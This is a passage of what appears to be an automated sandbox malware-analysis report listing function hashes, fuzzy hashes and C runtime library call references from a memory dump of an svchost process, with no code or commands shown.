                                                                                                                                                                                • Instruction Fuzzy Hash: 6B715EB4E002089BEB10DB94DD45BEDB7B5BF48308F5041A8E609BB2C1D6766E55CF68
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                • String ID: $oB
                                                                                                                                                                                • API String ID: 370429920-3132252410
                                                                                                                                                                                • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                • String ID: pB$XpB
                                                                                                                                                                                • API String ID: 3713721629-2178088481
                                                                                                                                                                                • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: '$'
                                                                                                                                                                                • API String ID: 2102423945-2527190458
                                                                                                                                                                                • Opcode ID: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                • Instruction ID: 53bb57586c5e39befda5455b8bbd06f4bf2bc56d3601b69197fc609fafef56d8
                                                                                                                                                                                • Opcode Fuzzy Hash: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C418171B04329EBEB20DFA0CC45FED77B4AB44704F804599B609BA1C0D7B5A644CF96
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                • String ID: ,SB
                                                                                                                                                                                • API String ID: 1628550938-3344058557
                                                                                                                                                                                • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1397555153-0
                                                                                                                                                                                • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                                                                • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: codecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3662085145-0
                                                                                                                                                                                • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
                                                                                                                                                                                • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2716363198-0
                                                                                                                                                                                • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2459447590-0
                                                                                                                                                                                • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3817610042-0
                                                                                                                                                                                • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04026C8A
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 04027019
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                • String ID: ir\
                                                                                                                                                                                • API String ID: 3817610042-1854106103
                                                                                                                                                                                • Opcode ID: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                • Instruction ID: 71bce72721c98fd701a8830471f0d2f2c7e2f459ebc33f17165b16ca64a09b40
                                                                                                                                                                                • Opcode Fuzzy Hash: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD118B0D00228DBDF54DFE8DA94BEDBBB1BF48308F108569E405BB280E735A945DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memsetcodecvt
                                                                                                                                                                                • String ID: wwww
                                                                                                                                                                                • API String ID: 2800761558-671953474
                                                                                                                                                                                • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: cE
                                                                                                                                                                                • API String ID: 2102423945-163553156
                                                                                                                                                                                • Opcode ID: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                • Instruction ID: fdc2fad14a78642c3e0d9cddc9ad9ddf1c8cf601b710c5b7852a6cc2ffa68677
                                                                                                                                                                                • Opcode Fuzzy Hash: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 40718170E04238EAEF60CF91DA547BDB7F5AB01305F14819AE4897E1C4D7746A84DF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $2$l
                                                                                                                                                                                • API String ID: 0-3132104027
                                                                                                                                                                                • Opcode ID: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                • Instruction ID: 97a9dc216c0970bdd76ba4c43342de9e9df9d78a676d099925bbab2bb04a16ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                • Instruction Fuzzy Hash: CD41DD30A862688AFF74CE64889C3F87BF5AB11359F4481CAC0A97A1C1C7757B86CF01
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                • String ID: `pB
                                                                                                                                                                                • API String ID: 3713721629-8080248
                                                                                                                                                                                • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: wwww
                                                                                                                                                                                • API String ID: 2102423945-671953474
                                                                                                                                                                                • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                                                                • Opcode ID: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                • Instruction ID: 6b2d4ef1dc70f01762c9ea93bfd451974196985589b21f9b2b8d381f5f98cc15
                                                                                                                                                                                • Opcode Fuzzy Hash: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                • Instruction Fuzzy Hash: 7791D8B4E00219DFDF44DF98D580AEEBBB1BF48318F248169E505B7381E735AA41CB56
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: codecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3662085145-0
                                                                                                                                                                                • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4053968246-0
                                                                                                                                                                                • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: codecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3662085145-0
                                                                                                                                                                                • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                  • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                  • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                                                                • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
